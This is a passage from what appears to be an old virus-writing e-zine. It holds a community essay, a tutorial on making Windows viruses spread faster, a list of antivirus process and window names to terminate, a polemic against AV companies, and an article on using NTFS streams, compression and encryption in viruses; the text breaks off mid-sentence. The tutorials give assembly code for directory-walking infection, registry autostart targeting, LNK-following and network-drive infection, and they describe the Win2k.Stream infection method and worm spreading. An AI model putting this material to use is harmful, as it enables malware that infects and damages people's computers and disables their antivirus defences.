background noise. And not just in Vx world. Try to do the same, you will see, life is easier. - Epilogue People involved in the virus community - i don't like the word "scene", this is not a theater, and there is nobody looking at us, another nombrilist deformation of reality, even in the terms used - always say that it's worsening with the years passing. More and more script kiddies and less and less die-hard asm coders who can spend six hours on a routine just to optimize it by saving two bytes. I don't think it's true. The problem being that people cannot separate their personal history from the global picture (that's not limited to the Vx world, of course). If you try to look at it with some distance, you will see that the vx community looks the same than five or ten years ago. Not in term of

techniques used, of course, but in term of personalities. New people pops in, old people quit, as an eternal cycle. In these two extreme populations, and in the large group of active vxers which sits in the middle, the proportion between posers who are just driven by an ego trip (ph33r M3!), and the really interesting guys who want to discover new techniques or possibilities, even through a long learning process, yes, this proportion stays always the same through the years. You have stupid old schoolers and stupid newbies who think they are Elvis, and you have interesting old schoolers and interesting newbies who want to learn, always. If you're reading this and you think you are part of the "scene", just think about in which category you fit best. But be aware that the image you have of yourself may not be the image that your Vxers colleagues have of you. If you're not satisfied with it, think about what you can do to change it and maybe to gain some respect. I'm not talking just about just improving your technical skills. Some people try to be creative with their limited knowledge (me, for example), other run websites, publish useful databases, are active collectors, help newcomers by writing tutorials, code other things than pure viruses, whatever. You can, at last, ameliorate your behaviour when interacting with other people. In other words: try to be mature. I will terminate here and return in my cave. Hope this helps.

Spanska - 20 September 2000

PS: Post a message in alt.comp.virus if you want to talk about that - I have no mail.

[copyquedalle: steal this text, modify it, sign it with your name, wipe your ass with it, i don't fucking care]

http://kickme.to/Cryptic/ fly.to/alpina

Faster Spreading or What to include in your virus to make it spread more effective by SnakeByte [[email protected]]

Here we go, please notice that it is illegal to spread viruses, and all this information is completely theoretical, or for testing purpouses in a controlled environment. I just wrote one Windows-Virus so you will see here just few lines of code.. ( interesting ones I think but maybe not very optimized ;) The task of a virus is to spread ( Payload is just a side-effect ). So we need some tricks ( besides infection *g* ) to make our virus spread, as fast as possible. Ok, when a virus arrives on a clean system, it will infect some files, sure .. ;) But if something went bad, we just get some files in the current directory and the victim deletes it, because he does not like the infected app.. :( Not very good, so what to do to avoid this situation ? Here are 6 ideas what we can do : 1.) 2.) 3.) 4.) 5.) 6.)

Infect as many file-types as possible. Try to drop over archives Parse Directory's Use the Registry Follow Links Worming

Ok, let's take a closer look at each of these methods:

1.) Infect as many file-types as possible. If you are macro coder, you should try to infect as many documents which support macro as possible ( DOC, CDR, DOT, PPT, XLS.. ). Same for the assembler coders, there are a lot of file formats which can be infected in Win32: PE-EXE, SCR (same as PE-EXE), DLL, HLP and VXD. Maybe you should try to code a hybrid which is able to infect Binaries on the one hand and macro on the other hand, this will offer you a much higher chance of finding files for infection. In VDat there is a description for how to infect most file types. I think adding 200-400 Bytes to your virus and being able to infect another type is a very good deal. The more files you infect the more likely you get your virus around.

2.) Try to drop over archives Nowadays nearly every file you download somewhere or get send by someone is zipped or packed with another archiver ( RAR, ACE ..) It is possible to infect the files in the archives too. It also offers

you a small protection against AV programs, because AVP for example does not scan archives by default. Read Unknown Mnemonix Tutorials about archive infection for more information about how to do this. So if you infect an archive you archive two goals ( stupid sentence ;P ) the might not get detected, it is possible that someone uploads the archiv to a website and your virus get's lots of hits..

3.) Parse Directory's Ok, now we infect a lot of files, but still all are in the same directory, so we need to change and parse directory's. What we should infect nearly always are the windows and the system directory's, cause they include a lot of files, which are highly used. Use the GetWindowsDirectory and GetSystemDirectory API's to retrieve their names. Then you should parse directory's to find more files to infect. Otherwise we would have infected the current, the win and sys directory, but nothing else, which is not very useful ( how often do you dcc a friend your calc.exe ? *g* ) There are two ways of directory parsing, the one is upwards the other downwards. If you travel downwards ( like cd.. in dos), you would normally not find a lot of files, so traveling upwards is recommended. This can be simply done with a FindFirstFile / FindNextFile Loop. The current directory is assumed to be root on one of the drives. The FindNextFileProc and FindFirstFileProc are procedures that call the matching API's ( I think you'll also use them several times ) The RandomNR procedure just generates a random number in dx.

************************ ParseFolder: call InfectCurDir cmp [ebp+InfCounter],0 jbe EndParsing lea esi, [ebp+Folders] Call FindFirstFileProc inc eax jz EndParsing dec eax

; infect the current directory ; check if we reached the number of files we want to infect ; we infected enoug ? ok, leave !

; If there are no directorys we return ; otherwise we save the handle

GetOtherDir: ; first of all we check if this ; is a valid directory mov eax, dword ptr [ebp+WFD_dwFileAttributes] and eax, 10h ; if not we get the next jz NoThisOne ; one lea esi, [ebp+WFD_szFileName] cmp byte ptr [esi], '.' ; we will not parse into . or .. je NoThisOne ; directorys call RandomNR dec edx jz ParseNewDir

; ; ; ;

generate a random Number, if it is 1 we infect the directory, otherwise we go on searching we get this directory

NoThisOne: call FindNextFileProc test eax, eax jnz GetOtherDir EndParseDir2:

; Find next directory

; we close the search - Handle

mov eax, dword ptr [ebp+FindHandle] push eax call dword ptr [ebp+XFindClose] EndParsing: ret

; we just return

ParseNewDir:

; we got a direcory, let's change to it ; and infect it.. *eg*

; close Find-Handle mov eax, dword ptr [ebp+FindHandle] push eax call dword ptr [ebp+XFindClose] ; set new directory lea esi, [ebp+WFD_szFileName] push esi call dword ptr [ebp+XSetCurrentDirectoryA] jmp ParseFolder

; parse it again !

Folders db '*.',0 ************************

4.) Use the Registry The Windows Registry also offers us a lot of information about what files or directorys we should infect to be sure that our virus gets activated again and does not sleep inside some never used files. You need to load an additional DLL in your virus, but i think this is ok. If you can't load the DLL, just jmp over the registry routines and infect fewer files. I think you all know what the windows registry is or ? For those who don't: the registry replaces the old ini files which have been used in older versions of windows ( 3.1 ). The registry information is stored in the User.dat and System.dat. To view or change the registry use 'regedit.exe', which is delivered with every version of windows. The following API's are neseccairy to access the registry, they are all inside the ADVAPI32.DLL ! RegOpenKeyEx RegCloseKey RegCreateKey RegEnumKeyEx RegQueryValueEx RegEnumValue

-

Opens a registry key Closes an open key Creates a key Enumerates subkeys Retrieves a value Enumerates values

Ok, let's see some source how to get a value from registry : This little piece of code gets the Startmenue Folder ************************ lea esi, RegHandle push esi push 001F0000h push 0h lea esi, SubKey push esi push 80000003h

; complete access ; reserved

; HKEY_USERS

call RegOpenKeyExA test eax, eax jnz WeFailed

; if we failed opening the key, we return

; let's get the value lea esi, BufferSize push esi lea esi, Buffer push esi lea esi, ValueType push esi push 0 lea esi, Value push esi mov eax, RegHandle push eax call RegQueryValueExA

; Type of Value ; reserved ; ValueName ; Reg-Key Handle

mov eax, dword ptr [RegHandle] push eax call RegCloseKey WeFailed: ret SubKey Value ValueType BufferSize Buffer

db db dd dd db

'.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0 'Start Menu',0 0h ; Type of registry Value 7Fh ; size of buffer 7fh dup (0)

************************ Buw what can we use the registry for ? Ok let's see some interesting values : In these Keys are the autostarted files : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce Here are the paths of all installed apps, what about parsing this key ? ;) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths Several standard directories : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup Shared files ( infect them "two for the price of one" *g* ) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs Registered Help Files ( if your virus infects them, here you get a whole bunch of ) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Help Computer Network Name ( nice value for slow poly ) HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\ComputerName\ComputerName A list of installed files (vxd, exe, dll, hlp, pif,.. ) : HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\InstalledFiles

5.) Follow Links Windows uses LNK-Files to create shortcuts for often used files, so you don't need to copy a 8 MB huge file to your desktop. If you find such a Link, you should check if it points to a file you are able to infect, if so.. don't wait and drop your code over it. Very useful becomes this if you parse the Start-Menue or the desktop *eg* Here is some example code from my Win32.DDoS how to do this, it does not work with NT-LNK Files :( There is also an API we can use for this, but I never figured it out, but I think this is not that much code, so we can include it. I assume you retrieved the LNK-File with the help of FindFirstFile / FindNextFile and the information is stored in the WIN32_FIND_DATA Structure, I also assume that the file is mapped and the base address in MapAddress. ************************ ; first of all, we check for the file ; mark, it is a single 'L' followed by a zero mov esi, dword ptr [ebp+MapAddress] cmp word ptr [esi], 'L' ; check for sign jne NoLNK ; if it is no LNK File we close it ; Let's make a check for the file-size, ; I don't think that there are any shortcuts ; bigger than 1 MB, just to be sure. cmp dword ptr [ebp+WFD_nFileSizeLow] , 0400h ja NoLNK ; get the start addy in esi, and and the size mov mov xor add

esi, ecx, edx, esi,

dword ptr [ebp+MapAddress] dword ptr [ebp+WFD_nFileSizeLow] edx ecx ; we start checking at the end of the file ; for a valid filename in it

CheckLoop: cmp byte ptr [esi], 3ah jne LNKSearch

inc edx cmp edx, 2d je PointsDetected

LNKSearch: dec esi loop CheckLoop

; ; ; ;

we detect a filename by the 2 dots ( 3ah = : ) in the Drive for example C:\whatever\blah.exe we search for the ':'

; ; ; ;

there are 2 times 2 dots, when checking from the end of the LNK, we need the 2.nd the first : is inside the path ( without filename ) so we skip them

; ; ; ; ;

go on searching we search until we found the dots or searched the entire file ( size in ecx ) I don't want to create a SEH .. ;) if we end here, we did not find the two dots.. :(

NoLNK: ret

; return to search more files...

PointsDetected:

; we found the drive ( two dots ... *g* )

; esi points to them, now we need to check ; the name.. cmp byte ptr [esi+1], 0h je NoLNK

; ; ; ;

check if we got an entire path or just a single drive this can happen sometimes with NT or 2k shortcut files, so we better avoid them

PointsDetected2: dec esi cmp byte ptr [esi], 0h je NameDetected

; now we search the starting point of the name ; by searching for a zero

loop PointsDetected2

; ecx still takes care, that we don't ; search too far..

jmp NoLNK

; nothing found ? return..

NameDetected: inc esi

; ; ; ; ;

ok, esi points now to the name of the file you can now open this file and check if it is something you are able to infect it's just that easy, but very effective, if you do this in the right folders,.. ;)

************************

6.) Worming To make sure you don't stay on a single computer you should try to spread over networks. One way are IRC-Worms, which sends your virus to other chatting people. To my mind this is the easiest way to worm around. Another way is to check all drives and if you have access to a network drive, infect there some files. ************************ push offset Buffer ; offset of the buffer push 60h ; buffer-lenght call GetLogicalDriveStrings cmp eax, 0 je StopThis

; did we fail ?

lea esi, Buffer WhatDrive: push esi call GetDriveType cmp eax, DRIVE_REMOTE jne NoNetwork

call infectDrive NoNetwork: Call GetNextZero cmp byte ptr [esi],0 jne WhatDrive StopThis: ret

; we got a network drive

; esi still contains the offset of ; the root dir on the drive ; so we infect it.. ;P

; place esi after the next zero ; ( searching from esi onwards ) ; if we searched all drives we ; end here, otherwise we check the type

Buffer db 60h dup (?)

; I don't know that many ppl with 20+ ; Drives so this buffersize should be ; big enough ;)

************************ Another way is, like the 911-Dialer does, to scan IP ranges when the user is online for non-pass protected Netbus PC's. If you have access, just upload your virus ;) Finally, you can worm with the help of E-Mails, infect a program and send it with the help of Visual Basic Script or with the MAPI Commands around. This is maybe the fastest and most efficient way of spreading, cause the snowball effect is very huge. But if you use VBS and Outlook, please keep in mind that it is worse enough that your virus just spreads in one OS, if it also relies on two frontends ( OE and VB Scripting Host ) it becomes even worse ;)

Hope this little text helps at least some peoples, I enjoyed writing it, and hope you do so too while reading it... ;)

cu SnakeByte

AV-List 13.07.2000

( by SnakeByte [ [email protected]] )

What is the problem when using anti-AV tricks in a Virus ? The most of those you find in tutorials are simply outdated ( Think of the f-prot loop trick, which is still used ;) But in windows you have more possibilitys to get rid of the AV's You can stop the execution of files ( under win9x and 2k ), you can delete files, you can prevent files from being executed ( if you're ring-0 ) and you can close windows of other applications. So on this little list you find all you need for this. I looked for such a list because I wanted to know which files are used by AV's and which windows we should close to disable them ! But i found none, luck for you : Now I got a CD in my hands with several Shareware AV's and I collected several others on the net ( god i love this flatrate ;) So I took myself some spare time and made this little listing. I just have Win95 so I can just give information about the Win9x Versions. If you have another Version of a program, which is listed here, installed or informations about a program which is not listened here, please contact me, so I can expand this list and keep it actual.

************************************************************** Anti-Viral Toolkit Pro ( AVP ) Files: *.avc Virus Database ( The Normal EXE Files seem to start the _ ones ) _avp32.exe AVP Avtiviral scaner shell _avpcc.exe AVP Control Centre Application _avpm.exe AVP Monitor avp32.exe AVP Scanner ( Main File ) avpcc.exe AVP Control Centre Application avpm.exe AVP Monitor avpdos32.exe AVP Scanner for DOS avptc32.exe AVP Scanner for DOS exec.exe unknown avpupd.exe AVP Update ( leeches new *.avc files ) Window-Names: AVP Monitor AntiViral Toolkit Pro AVP Updates

************************************************************** AntiVir 9x Files: Antivir.vdf AVE32.exe Avgctrl.exe Avnt.exe Avrep32.exe AVSCHED32.exe AVWIN95.exe Avwupd32.exe

Virus Database Scanner ( DOS ) Monitor Scanner ( DOS ) Report Viewer Scan Scheduler Scanner Update

Windows: H+BEDV AntiVir Guard/9x

AVWUPD32

************************************************************** Dr. Solomon Virus Scan Files: scan.dat AVConsol.exe Bootscan.exe ECEngine.exe FindViru.exe scan32.exe scrscan.exe VSCAN40.exe vshwin32.exe Webscanx.exe

Virus Database ( assumed ) Scheduler MBR-Scanner ( DOS ) Download Engine Scanner ( DOS ) Scanner ScreenSaver + Scanner Desktop for the Scanner Monitor Webscanner

Windows: vsstat Avconsol Webscanx Vshwin

************************************************************** F-Prot for WIndows Files: *.def Expert.exe FP-Win.exe f-stopw.exe Vir-help.exe

Virus Database Help & Information ( DOS ) Scanner Monitor Help-File ( DOS )

Windows: FP-WIN F-PROT für Windows ( German Version ) F-STOPW Version 5.06c

************************************************************** F-Prot 3.07B Files: *.def F-prot.exe

Virus Database Scanner ( DOS )

************************************************************** F-Secure Anti-Virus for Windows 95 Files: *.avc DVP95.exe DVP95_0.exe F-agnt95.exe F-prot95.exe

Virus Database ( uses same as AVP ! ) F-Secure Gatekeeper F-Secure Gatekeeper F-Agent F-Secure Anti-Virus Launcher

Windows: F-Secure Anti-Virus for Windows 95

F-Secure Anti-Virus F-agnt95 Dvp95

************************************************************** G-Data AntiVirenKit ( German Program ) Files: *.avc AvkServ.exe AckWin32.exe notstart.exe

Virus Database ( Same as AVP ! ) Scan Server Scanner creates Bootdisks

Windows: AntiVirenKit 9

************************************************************** InoculateIT Personal Edition: Files: Vet95.exe VetTray.exe AutoDown.exe Rescue.exe

Scanner Monitor Update Dos-Scanner

Window-Names: InoculateIT Personal Edition InoculateIT Real-Time Protection Status vettray AutoDownload

************************************************************** Norman Virus Control Win 9x Files: Claw95.exe Claw95cf.exe Normist.exe Nvc95.exe Nupgrade.exe NVCbin.def NVCMacro.def

Monitor Configures Monitor Smart Behaviour Blocker Scanner Internet Upgrade Virus Database Virus Database

Windows: Norman Virus Control for Windows 95/98 Cat's Claw v4.80

************************************************************** Norton Anti Virus ( NAV ) Files: navapw32.exe NavLu32.exe Navw32.exe Windows: navpw32 Norton AntiVirus

Monitor Update Scanner

************************************************************** Sophos Anti-Virus for Win95: Files: VDL.dat Sweep95.exe

Virus Database ( assumed ) Scanner

Window-Names: Sophos Anti-Virus - SWEEP

************************************************************** Trend PC-Cillin 98 Files: IOMon98.exe PCCWin98.exe

Monitor Scanner

Windows: Trend PC-cillin 98 Iomon98

************************************************************** RAV 7 Files: *.vdm Jedi.exe Monitor.exe rav7win.exe rav7.exe

Virus Database Scan Scheduler Monitor Scanner Scanner ( DOS )

##############################################################

Are Anti-Virus Companies Criminals? SnakeByte Hi, maybe you start wondering about this headline, but I will tell you some facts which brought me to this question ;) The first thing is, that in several countries there is a law against the ownership of viral sourcecodes and binaries. But this also includes, that it is forbidden to share these things. What do AV'ers do ? They share their files so they all are able to include common viruses into the databases. In addition to this, they have a lot of viral binaries and disassemblys in their labs, to analyze viruses. The next fact is not related to a country-specific law, but to international copyright. Most of the software for MS-DOS and Windows ( which are the favourite platforms for viruses ), is commercial. What does this mean ? You got to pay for the software you use. If you copy it completely or parts of it, whithout paying for the code, you break international copyright laws. Heh, what does Kasperski and the others ask me for ? I shall send them files which I suspect to be infected ? I can't believe this, they ask me to commit a crime ! I don't know how other countries handle this, but here in germany if you make another person commit a crime it is nearly as worse as committing the crime on your own. Last time I installed something commercial on my PC, I was so bored, that I read the disclaimer ( you know the window with lots of text you normally just see for a short time, cause you directly press >next< ). I was wondering when I saw the little paragraph about reverse engineering. If you own this program, you agree to the terms, that you will never ever reverse this program. ( If you don't own the program you break the copyright I talked few lines above about *g* ). Heh, how do the Anti-Virus researchers analyze viruses ? They reverse the virus, to get knownlegde about how the virus works. Whoah, to do this, they also need to disasm the infected program. Another law they break. I really don't think that they just start the file to infect some goats, if they would, they get in danger that new hardware attacks destroy their systems ;) Another thing is that several Anti-Virus Companies start to work on Scanners, which work on mail-servers to stop outgoing viruses. The mail will not be delivered. Due to the fact, that a most virus scanners can scan compressed files and so on, there is no easy way for a normal user to send a virus to his favourite AV Company, if the webserver he uses has one of these scanners running and the scanner has the virus inside its database. Ok, why is this so criminal ? They exclude smaller AV-Companies by this from the market. I for myself write a simple, free Anti-Trojan Tool. How should I receive submissions from peoples which want tu support my work ? It is impossible and therefore I can not longer work on my product. By this, they use their nearly-monopol like place to get rid of concurrents. This is illegal, as you see on the current proceedings against Microsoft. What if we consider viruses to be an art ? In a way the author created something unique, which may be assumed to be an artwork like a book or a painting ( If you look at abstract artwork, nearly everything may be considered to be art *g* ) What about the destruction of art ? Nearly everywhere this is illegal or at least against the ethics ( Just think about the burning of books by the germans during the WW2 ) So this might be another crime they commit. What if we would place a copyright in our software ? Something like: "You can freely distribute this program, as long as you do not change anything. Disassembling and the forwarding to the Anti-Virus Community is forbidden. This program is protected by international law. It is just meant for analyzing artificial intelligence on controlled environments. It is also strictly forbidden to place this program on a non controlled environment and place it into the wild.. bla bla" Just use their laws, to forbid them analysing our creations. If you see the virus in a AV-Database you know they have broken this law and you can take them to the court... ;) Ok Mr. Kaspersky go and get some good lawyers ;)

Some Tipz & trix for Win2k 1. Introduction I just wanted to write an article about NTFS5. But I am reading a lot of documentation about Win2k and I found there many functions and sequences that could be very usefull for us, virus coders. So i decided to write some tipz and trix that anybody could use. I hope I succeeded. btw It's my first english written article so pls be patient. My english sux so if you don't know what something means, just contact me. And now we can begin ... 2. NTFS5 I think you all expected this:) And i also read on virus.cyberspace.sk that english version of my article for Igi is requested. I won't exactly translate what i wrote there becoz it wasn't for coders. This will be :) 2.1. Streams Streams is not a new feature of NTFS5 and it was implemented in NTFS since the very beginning of WinNT(version 3.1) but it has been downplayed by Micro$oft. In Win2k the position of Streams is much better. And there also exists the first virus that uses Streams. It's of course mine and Benny's/29a Win2k.Stream. I think ya all have heard about it becoz of big medial success. It's an very easy and simple virus with a good idea I think. First we heard about Streams from a man called GriYo/29a (heya and thx man!) on meeting in Brno. And then when Benny came to me for some days we decided to write our first common virus (and my first). It was really funny becoz we coded through the nite and very lately we didn't even know what we are typing :) There also existed a version of Win2k.Stream with polymorfic name of stream! But next day when we woke up and talked about it in the pub we decided to write it as simple as possible. And I think we succeeded - the comment is longer than the whole code XD. First we'll look what Streams exactly are and then we'll talk more about our virus. On filesystems such as FAT, FAT32 and others exists only one unnamed stream. What do ya think it is? Exactly! The file alone. But on NTFS there exist also others (data) streams with a name. The name begins with ':' to indicate that it's a named stream (part of file) and pastes together with filename (the unnamed stream). Look at this: We have a file file.txt. It is also the unnmed stream. We would like to create a new stream within the file file.txt. We want to name it "RAT" for example. So we simply add ':' before stream name and paste it to file name. So now we have somewhere in the buffer this: "file.txt:RAT". And now there's nothing easier than just use CreateFile(A|W) to create our stream. If creation succeed you will get a handle that you can uses as it would be a normal file (it is exactly a normal file ...). Well we have a stream within the file but we forgot its name :) Any solution? Yeah there is one. It's not so comfortable as it should be but there is. For our needs we'll need a function called BackupRead that can be found in kernel32.dll. Look what MSDN says: BOOL BackupRead( HANDLE hFile, LPBYTE lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, BOOL bAbort, BOOL bProcessSecurity, LPVOID *lpContext );

// // // // // // //

handle to file or directory read buffer number of bytes to read number of bytes read termination type process security options context information

For our purposes we can ignore such thingiez as security and context. hFile is handle to file we want to enumerate streams. lpBuffer should point to a structure called WIN32_STREAM_ID. WIN32_STREAM_ID struc DWORD dwStreamId; DWORD dwStreamAttributes; QWORD Size; DWORD dwStreamNameSize; WCHAR cStreamName[ANYSIZE_ARRAY]; WIN32_STREAM_ID ends The first bytes of this structure represent the header of each stream. Then begins the name of the stream and after the name there is the content of stream. To enumerate all the streams, you just need to loop until BackupRead returns False. Just look at the code snippet: ; in ebx - file handle to enumerate streams enumerate_streams: push offset lpcontext push 0 push 0 @pushvar
push 20 push offset buffer push ebx call BackupRead ; read the stream header xchg eax, ecx jecxz end_enumerate_streams ; error ? push offset lpcontext push 0 push 0 @pushvar
push dword ptr [buffer+16] ; push stream_name_size push offset buffer+20 ; stream_name_size store to buffer+ push ebx ; header_size call BackupRead xchg eax, ecx ; error ? jecxz end_enumerate_streams ; Now we have in buffer+20 the stream_ ; name in Unicode. Its length is ; [buffer+16] ... push offset lpcontext ; becoz BackupRead loox at file and its @pushvar
; streams as it would be on file we must @pushvar
; seek after stream content. push dword ptr [buffer+12] push dword ptr [buffer+8] push ebx call BackupSeek xchg eax, ecx ; error ? jecxz end_enumerate_streams jmp enumerate_streams ; go on with another stream_name ... end_enumerate_streams: Well i think that this is all you should know about streams for the beginning. Just make some more coding with it and i think you will become more familiar with it and you will use it in the future. Remember the words from Kaspersky/AVP: Stream companion is a new breaktrough infection which is very hard to detect! Just make some more wrinkles to AVers ... 2.1.1. Win2k.Stream And now something more about our babe. After the execution tries to find via

FindFirst&FindNextFile find victimz to infect. It infectz only *.exe files in current directory (there were no reasons to spread it). The infection worx as follows: first it chex if the file is compressed (viz. next chapter) then it creates a temp file and copies the main stream to it copies virus_body to main_victim_stream moves tempfile to stream :STR compresses the file so after infection the file loox as this: (This are pictures from AVP :)) File before infection

File after infection

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³ ³°°°°main stream°°°°³ ³°°°°°°°°°°°°°°°°°°°³ ³°°°°program body°°°³ ³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³±±±±±±±±±±±±±±±±±±±³ ³±±service streams±±³ ³±±±±±±±±±±±±±±±±±±±³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³°°°°°°°°°°°°°°°°°°°³ ³°°° main stream°°°°³ ³°°° virus body°°°°°³ ³°°°°°°°°°°°°°°°°°°°³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³°°°°°°°°°°°°°°°°°°°³ ³°additional stream°³ ³°°°°°° :STR °°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³±±±±±±±±±±±±±±±±±±±³ ³±±service streams±±³ ³±±±±±±±±±±±±±±±±±±±³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

then it tries to find next file etc. At the end it just runs via CreateProcess the :STR stream where is victim_body. When the victim ends it just invokes ExitProcess and ends. If any error occures it displays following text: "Win2k.Stream by Benny/29A & Ratter" "This cell has been infected by [Win2k.Stream] virus!" and ends. This is also a payload on FAT, FAT32 and others filesystems that do not support streams. And that's all. Simple ain't it?

2.2. Compression and encryption We also as first used in our babe NTFS ability to compress files. It is transparent for application so it is a great way how to reduce disk free space decreasing after infection occures. If we want to compress file we must call file_system driver via DeviceIoControl with the rite IoControlCode ... look at this code snippet from Win2k.Stream and also from my Win2k.Purple (but the first who did this was Benny/29a in his Win32.HIV. On our mini-meeting he decided that we will use it in Win2k.Stream first ...) FSCTL_SET_COMPRESSION

equ 9 shl 16 or 3 shl 14 or 16 shl 2

xor eax,eax push eax @pushvar
push eax push eax push 4 @pushvar
;default compression push FSCTL_SET_COMPRESSION push ebx ;NTFS compress it = call DeviceIoControl ;mark as already infected

; = and save disk space :) and now what MSDN says: BOOL DeviceIoControl( (HANDLE) hDevice, FSCTL_GET_COMPRESSION, NULL, 0, (LPVOID) lpOutBuffer, (DWORD) nOutBufferSize, (LPDWORD) lpBytesReturned, (LPOVERLAPPED) lpOverlapped );

// // // // // // // //

handle to file dwIoControlCode operation lpInBuffer; must be NULL nInBufferSize; must be zero output buffer size of output buffer number of bytes returned OVERLAPPED structure

I think that it is clear. And also simple to implement to your virus. Just do it! Next thingie is Encryption. It can be easyly used by calling functions EncryptFile and DecryptFile :). I think that it could be aplied as a payload becoz if you encrypt on the machine with Win2k a file then only the user who encrypted the file has access to the file. After encyption of some files there can be very good chaos on the machine :) BOOL EncryptFile( LPCTSTR lpFileName ); BOOL DecryptFile( LPCTSTR lpFileName, DWORD dwReserved );

// file name

// file name // reserved; must be zero

I think i'm repeating myself but - easy to implement, easy to use ...

2.3. Sparse files I dunno if anyone finds use for sparse files in virus coding but i found this as a very nice feature of NTFS5 so i would like to talk about it here. Have you ever imagined how much space must be wasted in databases in which most of the file is null (free records)? A lot of :) And here comes a solution for such applications. Sparse files. (sounds like a promote of M$ :)) We as programmers can define where in the file lie such holes (with nulls) and say it to the filesystem. Filesystem will just store to disk datas which by which we say that are not null ... code snippet will show more: BOOL DeviceIoControl( (HANDLE) hDevice, FSCTL_SET_SPARSE, NULL, 0, NULL, 0, (LPDWORD) lpBytesReturned, (LPOVERLAPPED) lpOverlapped );

// // // // // // // //

handle to a file dwIoControlCode operation lpInBuffer; must be NULL nInBufferSize; must be zero lpOutBuffer; must be NULL nOutBufferSize; must be zero number of bytes returned OVERLAPPED structure

FSCTL_SET_SPARSE equ 9 shl 16 or 2 shl 14 or 49 shl 2 FILE_BEGIN equ 0 push push push push

0 0 CREATE_ALWAYS 0

; create file SparseFile

push 0 push GENERIC_WRITE @pushsz "SparseFile" call CreateFileA xchg eax, ebx xor eax,eax push eax @pushvar
push eax push eax push eax push eax ; push FSCTL_SET_SPARSE push ebx call DeviceIoControl push FILE_BEGIN @pushvar
push 0 ; push ebx ; call SetFilePointer push ebx ; call SetEndOfFile push ebx call CloseHandle

Sign this file as a SparseFile

Move filepointer to 32GigaBytes (hyea Gig :)) SetEndOfFile == ; fill with nulls to 32 gigz

This code snippet will create a file which size is 32GB! But acutally the real size is null :) Nice aint it ? And how to let the filesystem know that we have sparse in our file? Here's a prototype of function that we can use ... BOOL DeviceIoControl( (HANDLE) hDevice, FSCTL_SET_ZERO_DATA, (LPVOID) lpInBuffer, (DWORD) nInBufferSize, NULL, 0, (LPDWORD) lpBytesReturned, (LPOVERLAPPED) lpOverlapped

// // // // // // // //

handle to a file dwIoControlCode operation pointer to FILE_ZERO_DATA_INFORMATION size of input buffer lpOutBuffer; must be NULL nOutBufferSize; must be zero number of bytes returned OVERLAPPED structure

typedef struct _FILE_ZERO_DATA_INFORMATION { LARGE_INTEGER FileOffset; LARGE_INTEGER BeyondFinalZero; } FILE_ZERO_DATA_INFORMATION, *PFILE_ZERO_DATA_INFORMATION; And that's all about sparse files for now ... 2.3. Reparse Points This thingy is my little favourite :) What are reparse points? A reparse point is a block of user defined data associated with a file or directory. The content of that data knows aplication and file system driver (filter) which will filtrate it. When NTFS wants to open a file and recognises that that file has a reparse point it firstly tries to find a file system filter which belongs to that reparse point (in it's structure is a tag ...). If succeeds then passes that raw data (max 16KB) to that filter and what that driver does is on him. The file system driver you install is on the top of file systems drivers. What you intercept depends on you. Do you see it? You can do everything with that file. You can infect files just by setting reparse point to it. You can change some datas in that file, store it to reparse point and whenever the file is opened you renew that content and on the file close you reinfect it. Without your file system filter will be in the file broken content ... With this you can infect !_all_! files! I must say that it is charming. But it has some holes. We must find out how to spread the mother (file_system_driver). But firstly we must create that mother :) This will be a little problem becoz we need

IFSkit (kit to write installable filesystem drivers) and M$ wants too much money (for me ...) for it. If someone has it pls contact me. And it also needs some more studying. But one time it will come :)) 2.4. Mounting To this theme is not so much to say. I think that most of ya know mounting from various *nix systems such as Linux. If you want to set a volume point you will need 3 functions. GetVolumeNameForVolumeMountPoint, SetVolumeMountPoint and sometimes DeleteVolumeMountPoint. If you want documentation, lemme know. I'll give it to you. Just one thing to mention. In *nixes is this feature implemented for 30 years. Micro$oft implemented it now. That means 30 years hole between technologies?? Everyone must answer this question on his own :)) That's all for now about NTFS5. There's more to say in each of that themes I was talking about in this article but i think it is enough for the beginning. Just code and study and if you will have problems contact me. If I can help you (==if I will know it) I will help you. 3. Job kernel object You have problems while managing processes in your virus? Your virus uses IPC and creates a lot of processes and you want and comfort way how to destroy them all? In Win2k you can use a Job kernel object which lets you to group processes together and create a sandbox that restricts what these processes are allowed to do. Then you can destroy all the processes just by destroying the Job object. Let's go deeper. First you must create a job object. This can be done via CreateJobObject api fc. HANDLE CreateJobObject( LPSECURITY_ATTRIBUTES lpJobAttributes, // SD (can be null for our purposes) LPCTSTR lpName // job name (if null then job is ); // a noname job :)) So now we have created a job and we have handle for it. Now we must assign some process to it. Just use AssignProcessToJobObject ... BOOL AssignProcessToJobObject( HANDLE hJob, // handle to job 